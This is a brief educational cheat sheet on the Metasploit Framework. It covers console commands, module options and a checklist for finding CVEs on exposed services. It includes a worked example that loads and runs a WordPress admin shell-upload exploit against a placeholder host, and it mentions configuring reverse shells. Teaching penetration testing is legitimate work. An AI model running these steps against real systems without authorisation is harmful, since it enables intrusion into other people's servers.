Metasploit Framework Usage
Educational Purposes Only!
"The Metasploit Framework is a Ruby-based, modular penetration testing platform that enables you to write, test, and execute exploit code. The Metasploit Framework contains a suite of tools that you can use to test security vulnerabilities, enumerate networks, execute attacks, and evade detection. At its core, the Metasploit Framework is a collection of commonly used tools that provide a complete environment for penetration testing and exploit development." - https://docs.rapid7.com/metasploit/msf-overview/
Standard Usage:
1. msfconsole
2. search
3. use
4. show options (shows exploit specifics)
Example:
use exploit/unix/webapp/wp_admin_shell_upload
set RHOST http://example.com
set RPORT 80
set TARGETURI /
exploit
Tip: setg can set the values globally
More options:
1. show targets
2. show payloads
NOTE: when you show options, it only shows options for the module, not metasploit itself. If you are using a reverse shell, you need to set LHOST for example which isn't shown at first. Also it can be useful to specify directory
How to find CVEs:
- Find out the services and ports
- Connect to the port/service - curl, nc, ftp, ssh etc..
- Check if you can find versions
- check if there are any CVEs that include the version
- Check if metasploit has any modules